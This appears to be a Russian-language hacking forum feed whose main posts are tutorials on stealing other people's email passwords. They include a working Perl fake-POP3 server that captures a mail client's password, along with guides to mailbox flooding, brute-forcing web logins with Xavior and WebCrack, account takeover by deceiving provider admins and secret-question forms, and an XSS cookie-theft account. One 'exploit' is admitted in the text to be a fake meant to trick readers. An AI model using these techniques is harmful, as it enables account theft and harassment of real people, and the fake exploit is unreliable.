Все игры
Обсуждения
Сортировать: по обновлениям | по дате | по рейтингу Отображать записи: Полный текст | Заголовки
лоха лоха, 29-09-2012 18:15 (ссылка)

mlaa gde mojno mailbrut lsko4at ludi dobryie pomagiteee plea

ia zblsa uji ska4ovat virusnyie mailbruty ska4ovat kto znaiet gde mojno reaaalno ska4at mail bruts)) pomagite pleaseeeee!!! bez virusov

Юра Краснов, 23-11-2011 08:43 (ссылка)

Секреты хакера. Защита и атака

Оригинальное название: Секреты хакера. Защита и атака
Описание: В этом учебном курсе представлена обширная информация о методах локальной и сетевой атаки
на компьютеры пользователей.[ Читать далее...  ]

Метки: книги

Юра Краснов, 23-11-2011 08:23 (ссылка)

Все для ХАКЕРА - супер секреты по взлому (2009)

Название: Все для ХАКЕРА - супер секреты по взлому (2009)

Читать далее...  ]

Метки: книги

Юра Краснов, 19-06-2011 18:55 (ссылка)

книга "Как взломать ADSL модем, Интернет нахаляву..."

Название: Как взломать ADSL модем, Интернет нахаляву...
Читать далее...  ]

Метки: Пособия

Юра Краснов, 07-06-2011 21:10 (ссылка)

книги по хакингу но на английском

Выкладываю тебе книги по хакингу на английском языке.
Читать далее...  ]

Метки: книги

Юра Краснов, 07-06-2011 21:04 (ссылка)

Небольшая подборка книжек по хакингу

Качество: Отсканированные страницы
Описание: Hacking.app
Читать далее...  ]

Метки: книги

Юра Краснов, 19-05-2011 22:21 (ссылка)

Восстановление паролей Pak: 2 (OFFICE, Archive WinRar-WinZip,PDF

Версия в раздаче: Средни
Операционная система: Windows 98, 2000, XP
Описание:
Читать далее...  ]

Метки: Инструменты

Юра Краснов, 19-05-2011 22:11 (ссылка)

ИНСТРУМЕНТЫ По Хакингу Pak: 5

привет орлы!Вот вам еще пара инструментиков вам пошакалить в инете и поприкалываться над ламерочками
Читать далее...  ]

Метки: Инструменты

Юра Краснов, 19-05-2011 22:04 (ссылка)

ИНСТРУМЕНТЫ По Хакингу Pak: 4

Версия в раздаче: Средни
Год выхода: 2003-2006
Операционная система: Windows 98/ME/2000/XP/2003
Читать далее...  ]

Метки: Инструменты

Юра Краснов, 19-05-2011 21:58 (ссылка)

ИНСТРУМЕНТЫ По Хакингу Pak: 3

Версия в раздаче: Средни
Операционная система: Windows 98/ME/2000/XP/2003
Год выхода: 2002-2007
Читать далее...  ]

Метки: Инструменты

Юра Краснов, 19-05-2011 21:52 (ссылка)

ИНСТРУМЕНТЫ По Хакингу Pak: 2

Версия в раздаче: Средни
Операционная система: Windows 98/ME/2000/XP/2003
Год выхода: 2002-2006
Описание:
Читать далее...  ]

Метки: Инструменты

Юра Краснов, 19-05-2011 21:45 (ссылка)

ИНСТРУМЕНТЫ По Хакингу Pak: 1

Версия в раздаче: Средни
Операционная система: Windows 98/ME/2000/XP/2003
Год выхода: 2002-2006
Описание:
Компиляторы:
Читать далее...  ]

Метки: Инструменты

Юра Краснов, 11-05-2011 23:31 (ссылка)

Восстановление паролей Pak: 1(ICQ, E-mail, Брутфорсы, Взлом PWL\

Восстановление паролей Pak: 1(ICQ, E-mail, Брутфорсы, Взлом PWL\SAM)
Читать далее...  ]

Метки: Инструменты

Юра Краснов, 11-05-2011 22:11 (ссылка)

журнал Хакер

огромная подборка журналов хакер который позволит округлить твой кругозор и углубить свой глубодум =)
Читать далее...  ]

Метки: Журнал Хакер

Юра Краснов, 31-08-2010 21:30 (ссылка)

нужно вытащить пароль с почтовой программы

Довольно тривиальная задачка – имеется установленный почтовик, в
котором вбит предустановленный пароль. Чтобы его расшифровать, есть,
минимум, 3 способа. Во-первых, заветный пароль можно вытащить из
конфигов (как вручную, так и различными приложениями). Однако в
большинстве случаев, пассворд шифруется, и изъять его не получается.
Например, те же Openpass, Passview или Recover не запускаются при
установленном антивирусе или файрволе. В итоге приходится
довольствоваться старым дедовским способом по искусственному
«выманиванию» паролей из почтовых программ.

1. Откроем твой любимый блокнот и напишем
простенький Fake-POP3-сервер, посредством которого вытащим любой пароль.

#!/usr/bin/perl

# Emulate the fake pop3 service ;)

use IO::Socket;

$|++; # Юзаем сокет и отрубаем буферизацию

$sock=IO::Socket::INET->new(Listen=>10,LocalPort=>110,Proto=>'tcp',Reuse=>1)
|| "Cant open port: $!\n"; # Создаем сокет на 110 порту локальной
машины

while($client=$sock->accept()) {

while(1) { # Слушаем новых клиентов и входим в бесконечный цикл при
каждом новом соединении

$client->send("+OK Fake POP Service ready\n"); # Выдаем баннер

$stat=$client->recv($data,1024);

$client->send("+OK Password?\n");

$stat=$client->recv($data,1024); # Организуем обмен данными
согласно RFC1939

(undef,$data)=split(' ',$data);

print "Password is \"$data\"\n"; # Отделяем пароль и пишем его в
консоль

close($client); # Обрубаем клиент и выходим из программы

exit;

}

}

2. Изменяем в клиенте хост почтового сервера на
локальный адрес (либо на любой другой, куда будет заливаться фейковый
скрипт).

3. Запускаем фейковый скрипт и инициируем процесс
получения новых сообщений. Как итог – ты получишь пароль в plain-text,
нарисованный в консоли. Задачка выполнена.

Кстати, таким нехитрым образом можно получить пароли от
совершенно любых клиентов (например, на FTP). Главное – знать команды
обмена в нужном протоколе.

Юра Краснов, 31-07-2010 23:35 (ссылка)

взлом емайла4

Начало начал


Самый
распространенный способ общения людей в
Инете - это несомненно E-mail (мыло, как
называем его мы - хацкеры:)). Можно
переписываться с кем угодно по всему миру,
получать новости, обменивать и скачивать
проги. Я бы не стал говорить, что мыло
действительно нужно каждому, это даже не
Рулезз! (правило жизни) и не ПОИНТ (базовая
точка), МЫЛО - эта сама жизнь! Жизнь в
Интернете основана на взаимном общении и
E-mail в этом - основа! Конечно, есть и другие
способы общения (Аська, BBS, Chat, IRC), но это не
так круто.

Не понимаю я людей, у которых есть выход в
сеть, но нет е-мейла. Последнее время меня
просто бесят люди без выхода в сеть и мыла.
Блин, ну мы же не в 18-ом веке живем: заводи Ё-маil
хоть каждый день! Че-то я отвлекся, эта
статья о том как [з]ахватить, [з]авалить, [з]акрыть
ящик соседа.

Работать с почтой можно по-разному.
Работать в браузере на страничках почтовых
служб наиболее глупо и небезопасно (хотя в
случае внезапной потери всей инфы на винте
это пригодится, т.к. письма хранятся на
серваке почтовой службы). Однако чаще
пользуются мейлерами - спецовыми прогами,
которые скачивают почту с серваков и выдают
тебе её на блюдечке. Типичный пример - OutLook
Express, который поставляется вместе с Маcтдаем
и потому многие его юзают (включая меня!).


Ready? GO!


Как можно узнать
пароли к чужому ящику? Существует масса
способов. Например, в некоторых почтовых
службах предлагают услуги по подсказке
пароля к аккаунту, если ты сообщишь им дату
создания этого ящика или ответишь на
некоторый вопрос (который ты сам задаешь
при создании шампуня). Ответы на эти вопросы
можно незаметно выудить из самого человека
(метод Социального Перегруза или БиоХака)
или попытаться подобрать самому. Например
самый распространенный вопрос - "Как меня
зовут?" или "Девичья фамилия матери".
Ну, и вариации на эту тему!


Подобная штука
есть на www.mail.ru,
www.e-mail.ru и www.newmail.ru,
etc. Конечно, самый надёжный способ узнать
пароль - это офф- или он-лайн шпионство (типа
засылка троянов). Здесь, как говорится,
результат не заставит себя долго ждать.


Let`s go FLOOD


Теперь поговорим о
конкретном: атака на мыло - это, в основном,
флуд/cпам ящика. Флуд - это когда ты утром
проверяешь почту - а там 1000 писем 100
килобабного содержания. Вот и попробуй
разобраться с ними. Вообще-то зафлудить
мыло проще пареной репы, поэтому этот
способ юзают только дауны и ламеры! Вот, к
примеру 3 способа:


1. Все, что нужно,
это подключиться к 25 порту какого-нибудь
почтового сервера (даже не обязательно
почтового, а просто того на котором
работает старая версия почтового демона,
или к компьютеру, предоставляющему
почтовый доступ к FTP sit'ам и представившись
тем, кому вы желаете подложить свинью
заказать пару-сотню файлов на ваше
усмотрение:)).


2. Воспользоваться
анонимным мейл-генератором. Спецовая прога,
которая создаёт огромное количество писем
и посылает их по адресу с вашего компа.
Таких прог существует куча, вот типичные
проги: HackTek и ещё лучше Avalanch. Только не
забудь включить анонимный прокси:). Хотя,
почти с каждой такой прогой прилагается
хороший прокси-лист. Если нет - бегом на www.void.ru=)).


3.
Воспользоваться почтовой службой
общественного пользования, типа www.mail.ru
или www.inbox.ru и под
анонимным логином отослать штук 20 писем
размером по 500кБ. Это самый гиморный способ,
да и к тому же письма отсылаются медленно,
но гораздо быстрее, чем это было бы с твоего
компа. Опять же обязательно врубай
анонимный прокси.


4.
Подписать атакуемое мыло на какую-нибудь
рассылку(или эхо) (типа компьютерные клубы,
где обсуждаются разные темы среди большого
круга людей. В принципе тут проблем нет, но я
не советую этим злоупотреблять, т.к. это
ламерские шутки. Используйте их, если есть
повод. Вот типично: вы договорились об
обмене данными, а ваш партнёр обманул вас.
Вот тут это и пригодится. Флуд - это как
ядерное оружие - все об этом знают, но никто
им не пользуется, зато в мире порядок и
дружба. Теперь ты тоже ядерная страна:).


4.
Зафлудить ящик с помощью cgi-скрипта на твоей
паге. Подробнее читай статью CuTTer-a (cutter@real.xakep.ru
в хз каком номере Х:).


Кто
я?


К
каждому письму прикрепляется небольшая
шапка, которая содержит много интересной
информации: IР-шник, название и
регистрационный номер проги - мейлера,
которым пользуется приславший письмо,
почтовая служба, уникальный номер письма,
путь прохождения письма до вас, время
отправления и прибытия, номер компа в
локальной сети и многое другое. Однако, всё
это скрыто от читателя, т.е. тебя! Давай
посмотрим эту интересную инфу. Если ты всё
еще пользуешься Outlook-ом, то открой
исследуемоё письмо и жмем Файл, затем
Свойства и выбираем закладку Подробности.
Теперь всё на виду. В The Bat! делаем так:
Открываем письмо, жмём Просмотр и выбираем
Служебная информация. Сверху письма
прибавляется шапка.


О
том,
что можно вытянуть из шапки, Я покажу тебе
на примере. # - МОИ КОММЕНТАРИИ.

Return-Path: sony-lamer@mail.ru

#Установленный адрес возврата, но он мало
что говорит, т.к. его с лёгкостью можно
подделать (мы сами ставим его в настройках).

Received: from relay1.aha.ru ([195.4.67.135] verified) by
aha.ru
(CommuniGate Pro SMTP 3.2b4)

with ESMTP id 4637825 for system@local.net; Sun, 10 Jun 1899 13:17:51
+0400


#Дата получения послания моим почтовым
серваком

Received: from elephant.mail.ru (elephant.mail.ru
[194.226.198.85]) by
relay1.aha.ru

(8.9.3/8.9.3/aha-r/0.04B) with ESMTP id XAA00604 for (system@local.net);
Sun, 11
Jul 1999 23:16:46+0400 (MSD)


#Дальше пошли почтовые серваки с их IPшниками
и датами получения\пересылки

Received: from camel-int ([10.0.1.1] helo=camel.mail.ru) by
elephant.mail.ru

with esmtp (Exim2.12 #1) id 113P5h-000NVu-00; Sun, 11 Jul 1999 23:16:45
+0400

Received: (from mail@localhost) by camel.mail.ru (8.9.2/8.9.1) id
XAA64053; Sun,

11 Jul 199923:16:45 +0400 (MSD)Date: Sun, 10 Jun 1899 13:17:51 +0400
(MSD)


#Вот и дата прибытия письма на мой почтовый
сервак.

Message-Id: 199907111916.XAA64053@camel.mail.ru

#Уникальный номер письма. Если тебя
зафлудили или прислали что-нибудь
нехорошее, то ты можешь нажаловаться админу
почтового сервака, переслав ему эти письма.
Подробнее читай ниже.

Received: from [212.46.8.60] by win.mail.ru with HTTP; Sun, 10 Jul 1985
19:16:45
+0000 (GMT)


#Попался! IP-шник приславшего с датой
отправки

From: =?KOI8-R?Q?"Ипполит=20Т"?= (sony-lamer@mail.ru)

#Кодировка отправления и мыло
отправителя

To: system@local.net


#это ты.

Cc: sony-lamer@mail.ruSubject:
=?KOI8-R?Q?Re:=20Ксакеп-круто=кул?=

Mime-Version: 1.0X-Mailer: The Bat! (v1.33) S/N 9EB473C9


#Посылал The Bat! версия и регистрационный
номер как на ладони.

X-Originating-IP: [212.46.8.60]?IP'шник товарища,отправившего
мне письмо.

Content-Type: text/plain; charset=koi8-r


#Сообщение выслано прямым простым текстом в
кодировке KOI8-R

Content-Transfer-Encoding: 8bit?

Далее идет никому не нужная муть:).


Способы послать
анонимный е-мэйл мы уже рассмотрели выше на
примере, как зафлудить ящик. В этом случае
нужно просто послать всего одно сообщение,
а не 10000! То, что вас не узнают - это 100%. Только
не нарывайтесь на международные службы
типа FBI или ФАПСИ, они могут узнать ваш IP у
прокси-сервера (вот им он точно расскажет!).
Но, я думаю, Вы люди умные и сами сможете
определить - на кого стоит нарываться, а с
кем лучше дружить (правило хакера: не
ссорься со всеми сразу!:)).


Brute Force


Можно так же
узнать пароли на мыло и прямым Brute Force. Но
используя ресурсы только твоего компа - это
может занять месяц! Тут нужно действовать
по-другому. Возможно организовать Brute Force
атаку с вашей паги (page) используя Java-апплет.
И каждый посетитель вашей странички (с
согласия или без) будет принимать участие в
кряке! В этом случае можно сломать пароль и
за 2-4 дня! Но подробнее об этом позже. Если у
тебя выделенка - уже лучше, но лучше юзать
рут шелл(как получить бесплатный шелл читай
скоро на [x]).


Письма
смерти.


Рассматривать
захват
почты буду на примере халявной
почтовой службы. В принципе, таки образом
можно захватить таким способом любой ящик в
сети. Итак ищем жертву. Допустим, это опять
Василиса Пупкевич с мылом sony-lamorz@mail.ru.
Для начала ты должен отправить ему на мыло
любое письмо для проверки, в котором
попросить, найти любую причину, отправить
вам обратно это письмо как можно быстрее.
Способ работает только тогда когда
владелец регулярно проверяет свою почту, в
данном случае почту sony-lamorz@mail.ru.
А если нет, зачем тебе тогда это мыло?:)). Вам
необходимо написать на английском письмо
со спамом, надеюсь этому учить не надо, хотя
для тех кто не умеет выражаться вот пример.
Вы отправляете ему это письмо в txt файле и
просите послать ламера это письмо со спамом
вам обратно на почту, только нужно, чтобы
ламер скопировал данный спам и послал как
обычное письмо, без прикрепленного файла.
Дальше пишешь умную мессагу админу мэил.ру [support@mail.ru]
и говоришь в ней, мол, такой то ублюдок занимается
спамом, флудом о вообще онанизмом:). И
прилагаешь еще данное письмо со спамом.
Через несколько часов тебе приходит
извещение от админа посмотреть всю инфу о
пользователе, пославшем вам это письмо, это
делается очень просто: открываешь письмо
ламера , посланное тебе со спамом, нажимаешь
на кнопочку more details, или вроде того, и
копируешь всю инфу об этом письме и
владельце данного письма. Шлешь ее админу
мэил.ру, он проверяет своими способами, было
ли и вправду отправлено данное письмо, а так
как ламер вам сам его послал, то оно,
естественно, было отправлено вам, и в
последствии вам приходит благодарность и
ящик пива:) от админа мэил.ру, в письме от
админа будет говориться то, что данный ящик
закрыт благодаря таким людям как ты!
Отечество тебя не забудет, перец. Данный
способ обмана почтовых служб работает
только на бесплатных почтах, на платных
настоящего юзера не закроют у него сначала
50 раз спросят было ли все так, как я говорю.
Лучше в конце письма сделать небольшую
приписочку, вроде:

Юра Краснов, 31-07-2010 23:08 (ссылка)

Взлом HTTP паролей с помощью программы Xavior

Ну что же здарова кул-хакЁр!!!Ты
ещё
не кул-хакер???Ты ещё не натянул сервак www.whitehouse.gov??? Ты ещё даже
не
научился выкидывать ЛОМОВ из чата??? Ну так что же,
не беда, этому ты научишься позже...



Вот задаёшься ты вопросом: как же
этот кул-хакер взломал твоё вэб мыло и от твоего
имени рассылает коников и вирей??? Ну ничего
сегодня мы тебе расскажем как это делается самым
простым способом. Для этого тебе не понадобятся
какие-нибудь углубленные знания генной
инженерии и знания азбуки Морзе, а так же не
понадобится понятие принципа работы
электронного розгонятиля протонов в вакууме.



Ну так вот, сначала валишь на http://guest.btinternet.com/~lithiumsoft/xavior/Download.html
и сливаем себе рулезную прогу под названием Xavior
v1.0 Beta 7.Инсталим,там ничего сложного и
сверхъестественного, вот у нас уже есть оружие
начинающего Хакера.



Вот запустил ты енту прогу на
своей
тачке и видишь уродство и говоришь себе: "Блин
что это за убожество, отстой, ни картинок тебе, ни
нормального ХЕЛПА..." (у меня так и было...=)Но всё
пока ты не понимаешь ценности этой вещи. Ну вот
например я тебе напишу неполный список того что
ты можешь сделать с помощью этой проги:



  • подобрать пароль к мылу своего заклятого врага и поотсылать от его мыла выря или лошадку(ну тока не Прижевальского, ну да ты сам знаешь...)
  • поломать ТЕХ. ПОДДЕРЖКУ своего ПРОВА и раздобыть себе ХАЛЯВНЫЙ АККАУНТИК и делать далее усё что твоей хацкерской душеньке угодно (даже продать его=)
  • раздобыть себе АККАУНТИК к ПОРНУШКЕ и даже если ты таким не увлекаешься (может ты этакий КАЗАНОВА и на этих баб, тем более в голом виде уже смотреть не можешь, тошнит=), то есть много людей готовых за такой АККАУНТИК сделать ТтАаКкОоЕе!!!...уже проверенно...=)))


Ну и многое другое, надеюсь ты
сам
понимаешь...



Ну хорошо приступим к описанию
самой проги. Вот запустил ты её и смотришь...а что
же тут делать, а вот сейчас я это и объясню...



Перед тобой менюшка с 6
закладками, о
каждой по порядку:



1)Information-это закладка в
которой есть
такие опции как:



  • Usernames File-енто файл в котором задаются ЛОГИНЫ
  • Passes File-это файло в котром задаются ПАРОЛИ
  • Currently Position Filename-это файл с расширением *.xvp. Вот это и есть хорошая фишка этой програмульки, это значит что ты можешь долбать спокойно какой-то мыл и в нём сложный пасс и требует долгого и упорного долбления, а тут как раз время ночной халявы кончается =).И что делать ты думаешь, а ничего не надо, будет всё снова начинать!!! Прога запомнит позицию долбления и потом начнёт с неё.


Далее идёт status, то есть online
или offline
(где-то я уже это видел, вот тока никак не
припомню=).В правом углу идёт усякая ИНФА типа
номера сессии, попыток в секунду, оставшееся
время и т.п. Внизу есть 2 окна: первое-всякая инфа
ненужная, позиция долбинга (во как
сказанул=),второе-окно это списки ЛОГИНОВ и
ПАССОВ которые прошли или заканали...кто как
называет.



2)закладка General Options-это
собственно
говоря усе опции, а то есть:



  • Target(Adress/IP) - ну это адресок того, что собираемся долбить. Port-это порт по которому долбится будем, по умолчанию 80(HTTP)
  • Directory/File (For WEB servers) - ну а это папка на серваке куда долбится будем, по умолчанию /secure


-Program to masqurade as...-это
под что прога
шифруется



  • Number оf Sesions-это кол-во сессий


Далее надо поставить галочку на
Auto
Save Position every 100 attemps. Потом идёт выбор куда же именно
на серваке долбится будем, то есть:



  • Standart HTTP basic Authentication - это стандартная проверка ЛОГИН\ПАССА
  • CGI-BIN/POST - это определение ПАССА\ЛОГИНА по CGI и в ФОРМАХ
  • Scripting-это по скрипту


И вот последнее в этой закладке:


Checking Method-метод проверки=):



  • Loop throught passwrds file once for every user-это прыгать по ПАССАМ на 1 ЛОГИН,потом на 2 ЛОГИН и опять прыжки по ПАССАМ
  • Make passwrd equal to username-это как я понимаю прога берёт 1 пасс и прыгает по ЛОГИНАМ,вроде так
  • Brute Force all character combinations-вот это самая рульная вещь,тобиш БРУТ ФОРС или подбор по буквам



3) 3акладка
Scripting-установки скрипта.



4) 3акладка Mutators-это мутаторы
с
помощью их можно например сказать проге что-бы
юзала ПАССЫ и ЛОГИНЫ только в маленьких буквах.



5) 3акладка Brute
Forcing-установки БРУТ
ФОРСА или наборы символов.



6) 3акладка Advanced - вот нужная
в натуре
вещь, поподробней:



  • Use WWW Proxy-Web PROXY adress-Port - ну енто использование ПРОКСИ сервака, вещь архинужная и архиважная! Но вот пока не могу понять почему же по умолчанию она отключена %-Е
  • Sleep between multiple sessions... - пока сам понять не могу нафига оно надо...?
  • Minimize To Tray - без комментариев...
  • Use timeouts - это время отдыха проги между долбингом,советую отключить вообще
  • Log Accepted Names/Passes to "accepted.log"-енто записывать удачные ЛОГИНЫ и ПАССЫ в этот файл.



Ну да ладно этой усей
инфы,я лучше
расскажу всё на примере: вот например есть ПРОВ и
я знаю ЛОГИН (если у юзверя есть мыло, то адрес до @
и есть как всегда ЛОГИНОМ) и знаю что пасс у него
состоит где-то из 6 знаков. Мутим раз - берём Melco$oft
Notepad-и пишем там ЛОГИН, например superlamer, то бишь
мыло у него будет примерно такое: superlames@megaprov.com.
Дальше берём любой генератор паролей и задаём
ему сгенерировать 1000 паролей с большими и
маленькими буквами и с цифрами...есть??? Молодец!!!



Мутим два - осталось настроить
прогу
и в путь!!! Значит ставим в проге тот именно файл с
ЛОГИНОМ который мы там писали (superlamer),подставляем
файл с ПАССАМИ которые нам добротно
сгенерировала прога-генератор паролей. Дальше
ставим адрес, например www.users.superprov.com,
отключаем таймаут, включаем прокси (даже если у
тебя уже стоит ПРОКСИ, всё равно включи как
говорится "Оперативкой КОМП не испортишь!"=),
ставим галочку на log accepted...указываем файло для
сохранения попыток, что-бы не начинать при обрыве
связи всё с начала, и совсем забыл (БООТ сектор у
меня дырявый видно=) поставим ГАЛКУ в закладке
General Options на Auto Save Posichion every 100 attempts!!!



Всё, ты готов к ворованию
аккаунта.
Идём в меню Actions (это там вверху) и жмём GO!!!



В заключении хочу сказать что
если
усё сделано правильно, то должно получится... но
надо помнить что разные серваки построены на
разный ОС и это может и не заканать. И ещё надо
всегда помнить что: ЖАДНОСТЬ ХАКЕРА СГУБИЛА!!! Так
что вперёд к новым барьерам (аккаунтам, мылам и
т.п.)



Удачного тебе ХАКА мой
маленький
электронный вор!!!=)

Юра Краснов, 14-07-2010 01:44 (ссылка)

исчо раз о взломе емайл :-)


Один из самых простых
Пишите владельцу мыла какое нить
письмо, все равно с каким содержанием, но лишь бы хозяин мыла ответил.
Если это какой нить "чудо-крутой хакер", то что нить типа : "Слушай , а
ты в натуре можешь сайт сломать? http://www.xakep.ru не твоя работа?"
Если Веб-мастер , то что нить типа :"Мне так нравится как ты пишешь! А у
тебя JAVA-скрипта нету ,что б он там чe нить делал?"...По фигу ЧТО ,
главное что б от него назад ответ пришел. В принципе эта вся процедура
была только для того ,что б узнать ИМЯ_ФАМИЛИЮ (или ник) и место
расположения "клиента".То бишь если по этому мылу находится аська , то
смотрим инфу в аське , город (если не прописан в аське , то по ИП) , имя
, возраст и зип. Потом пишешь админу мыльного сервака (у любой мыльной
системы есть админ , и у 99% www-шные сервера) ,обычно это адреса
admin@provider.ru и support@provider.ru. Так вот... Пишешь письмо (очень
желательно через www-браузер , например от www.mail.ru или
www.hotmail.com ) и через анонимную проксю .Это для того что б в
заголовке пакета был ИП прокси. Так... для секьюрити... =) Так вот. В
теле письма пишешь , что так и так... Злобные хакеры украли у тебя мыло ,
а тебе очень нравится их служба , сервис , скорость работы
,безглючность и все такое... Что ты никогда не променяешь ихний сервис, и

что они вообще самые крутые мыльщики! Указываешь ИМЯ , ФАМИЛИЮ ,ЗИП ,
ГОРОД , Телефон (от балды) или что они там еще просят.... Ессено назад
придет письмо , что "Информация не совпадает с введеной при регистрации и
все такое...". Но ты будь настойчивей! Пиши назад , что то что ты им
выдаешь - единственная верная информация о твоем аккаунте! И повторяешь
им ту же инфу , что и первый раз. И так пока админ не сломится...но не
забывай каждый раз расхваливать их сервис!=) Обычно раз на 7-10
прокатывает... :) У меня был даже раз случай , когда один буржуйский
админ "отдал" мне мыло , где
(как потом оказалось) инфа прописанная в мыле ВООБЩЕ не соответствовала
той что я ему ВЫДАВАЛ якобы за владельца аккаунта!



Второй способ. Посложнее , но все равно общедоступный. Почти в каждом
мыльном сервисе есть служба что типа "Foggot Password?" Так
вот...Заходим туды (предварительно не забыв изменить атрибуты филе
cookie для этой службы на ReadOnly). Там обычно ОЧЕНЬ простые вопросы...
Если повезет , то вопрос будет (к примеру на мыло.ру) " В каком городе
ты родился"? В первом способе описано как узнавать город юзверя по мылу
или по асе, так же через программу SmartWhois 3.2 узнать город не так и
сложно, так что на этом не бум останавливаться. Ну и вопросы бывают
"кустомайзские"- типа "2000" , ответ обычно такой же. Авот если что нить
типа "Как зовут мою собаку?" , то читай дальше...



Открываем эту страницу (ну где вводить надо ответ на секретный вопрос ,
не догоняешь что ль???=) итам в HTML-просмотре ищем строчкутипа : form
action="/cgi-bin/3970.dll?secquest" итд... Так вот... Если урл мыла
http://www.mail.ru , то полный урл места куда отправляется"секретный
ответ" будет http://www.mail.ru/cgi-bin/.... Этот урл
вводишь вместе с индефикатором Вопроса в программу типа WebCrack 2.0 .
Идентификатор вопроса находится там же где и form
action="/cgi-bin/3970.dll?secquest, только чуть дальше . Потом в эту
программу или загружаешь встроенный wordlist c паролями или пишешь свой
по конкретной тематике, это зависит от вопроса . И вперед! Запускаешь и
ждешь...


Юра Краснов, 14-07-2010 01:40 (ссылка)

взламываем пароли email

Эта простенькая статейка о том, как утащить пароли от почты ваших
знакомых. Причем, что бы получить пароли описанным ниже способом не надо
быть гуру в области взлома - надо быть гуру в психологии человеческого
сознания.... Ну ладно, приступим. Все в курсе, что ламер - это
пользователь с очень завышенной самооценкой своих возможностей. Ламеру
кажется, что его возможности безгарничны, он может делать все что хочет,
если захочет. Порой эти люди так забивают свой разум мыслями о своем
величии, что попадаются на очень простые "засеры мозгов".

Ловушка которой пользуются, заключается в том, что ламеры считают себя
хакерами и непрочь сделать какую-нибудь гадость ближнему своему дабы
поднять свою самооценку (причем переписать соседовский пасс от инета на
бумажку и потом юзать его в тихую с пяти до шести утра - это просто
мега-хак в их понимании). Им опасно давать какую-либо информацию о
взломе, трояны, червяков....- все это они пускают в ход сиюминутно, не
задумываясь о последствиях. Но это свойство ламеров можно обратить к
себе во благо.Все знают про систему восстановления паролей на почтовых
серверах таких как mail.ru, rbcmail.ru, stsland.ru и т.д.

На mail.ru несколько МИЛЛИОНОВ пользователей. Есть процент, который
имеет слабую память и тупые мозги, чтоб запомнить свой пароль и
частенько эти перцы сталкиваются с проблемой забывания пароля. Пароли
должны быть легко запоминающемися. Например, имя вашей любимой собачки.
Итак, даже небольшой процент от более чем милионной толпы владельцев
мыльниц - это тоже своеобразная толпа, которая требует свои пароли.
Существуют всякие системы аля "Забыл пароль" в котором вас спрашивают
ответ на секретный вопрос, данные, которые Вы вводили при регистрации и
т.п. Но самое интересное, что этим занимается не человек, а машина, т.е.
обычная программулина !!!! А если есть программа - есть в ней дыра.
Теперь приступим к описанию конкретных действий. Тут все просто. По
адресу pasrepair@stsland.ru сидит mail-робот, который анализирует
запросы на восстановление пароля и в зависимости от этого либо уточняет
ваши данные, либо сразу шлет пароль. На сайте есть форма для заполнения
с всевозможными параметрами, которая потом шлется роботу со
специальным Subject'ом. Фишка в том, что если в сабжект впихнуть не
один, а два запроса, то проверятся будет последний ящик, а информация
будет выслана для второго! Так
шевелим мозгами... Правильно! Высылаем два запроса: в одном сообщаем
инфу о ящике жертве, во втором инфу о своем (о своем то мы все знаем ;) )

Итак, мы хотим обломать vasya_pupkin@mail.ru

Наш ящик hack@mail.ru пароль fooly

Пишем письмо роботу на pasrepair@mail.ru

Subject:
login=vasya_pupkin&pass=&answer=;login=hack&pass=fooly&answer=

Т.е. первый раз вставляем в тему письма запрос о ящике-жертве -

vasya_pupkin@mail.ru :
login=vasya_pupkin&pass=&answer=

А потом, через точку с запятой второй запрос, с вашими данными, которые
робот проверит и убедится, что они правильные!
login=hacker&pass=qwerty&answer=

Итого : тема сообщения выглядит вот так :

login=vasya_pupkin&pass=&answer=;login=hacker&pass=qwerty&answer=

Все, ждите пасс на ваше мыло!!!


Я надеюсь этой статье вы не поверили, потому что все это сделано для
того, чтобы тянуть пароли, так что остерегайтесь таких казусов, ух ты
блин какое слово :))

С 8 Марта!

Поздравляю всех участников сообщества с праздником, приглашаю на мой блог!
Дарю вам полезную информацию и стихотворение к празднику!

Юра Краснов, 15-02-2010 21:55 (ссылка)

еще вариант как взламывают на мой мир....

Четырнадцатое февраля, год 2008. Мыло, ася и прочие средства
коммуникации уже до отказа завалены сердечками и прочей романтичной
лабудой. Народ дурачится, влюбляется, ссорится и мирится в Сети. А
также скамит, ломает, и сканит. И тут, по иронии судьбы, мне в ящик
свалилось несколько уведомлений о том, что мои комменты на проекте
«Ответы» mail'а были признаны лучшими. Я полез на проект освежить в
памяти собственное творчество. Мимолетом просмотрел ТОП вопросов и пару
страниц в рубрике компьютеров и интернета. Листая темы, я стал все чаще
замечать появление сообщений странного содержания. Народ ругался на
выскакивающие окошки в IE, на левые фреймы, вставленные прямо в вопросы
и ответы пользователей… Конечно же, речь зашла об XSS, наличие которой
я не мог не проверить.

Быстренько сварганив очередной вопрос типа «а есть ли тут XSS?», я
поднял его в топы (не бесплатно, к сожалению) и стал ждать реакции.
Добрые люди запостили ответ с фреймом размером раза в два больше
разрешения моего монитора и подсказали, как это дело протолкнуть мимо
фильтров. Дальше оставаться в стороне я уже не мог.

Ведь если на майле реально украсть куки (а значит и чужую сессию),
то хакеру станет доступно и мыло жертвы (точнее, появится возможность
авторизации на mail.ru без ввода пароля). Очень и очень заманчиво!

Кто ищет, тот найдет
Собственно, как такового, межсайтового скриптинга на проекте не
обнаружилось. Максимум, что можно было сделать – вставить более или
менее разрешенные теги оформления шрифта, таблицы, фреймы и картинки.
Любые скрипты, валидно написанные обработчики событий и прочий
«опасный» контент сразу же квотился либо реплейсом вообще удалялся со
страниц. Миф о похищении куков витал в воздухе и распространялся со
скоростью 300 символов в минуту!

Попытки отправить в тексте скрипт в голом виде либо внедрить его в
события, скрытые от пользователя, успехом не увенчались. Что ж,
придется попробовать сыграть на доверии простодушных юзверей. И так как
народ приходит на сайт за ответами, я решил помочь бедолагам найти
ответы сразу на все вопросы, а именно – немного разрекламировать WiKi,
добавив в свой вопрос кнопочку для перехода на сайт энциклопедии. В
итоге получился примерно такой код:



Как видишь, тут всего один тег, который отображает кнопочку на
странице, но стоит ее нажать и браузер будет перенаправлен на наш
сторонний портал. Причем в адресной строке мы дополнительно передадим
один единственный параметр cookies, в котором и будут храниться куки
жертвы. Что с ними делать, рассказывать не буду: уж что такое сессии и
с чем их едят, ты должен знать!

Обрати внимание на JS-функцию escape() – без нее строка куков будет
передаваться «как есть», а это недопустимо: пробелы, знаки амперсанда
или одинарные кавычки порвут в клочья код события нажатия кнопки. А
подготовив всю строку этой функцией, мы сохраним ее как одно целое
значение GET-параметра cookies.

Научным методом тыка было доказано: для успешного проникновения на
страницы сайта, этот код дополнительно надо «заURLэнкодить». В PHP этим
занимается функция urlencode(string). Ею я и воспользовался. Чтобы
пробелы оставались пробелами, их я вернул в исходный вид (urlencode
превращает их в знаки «+»).

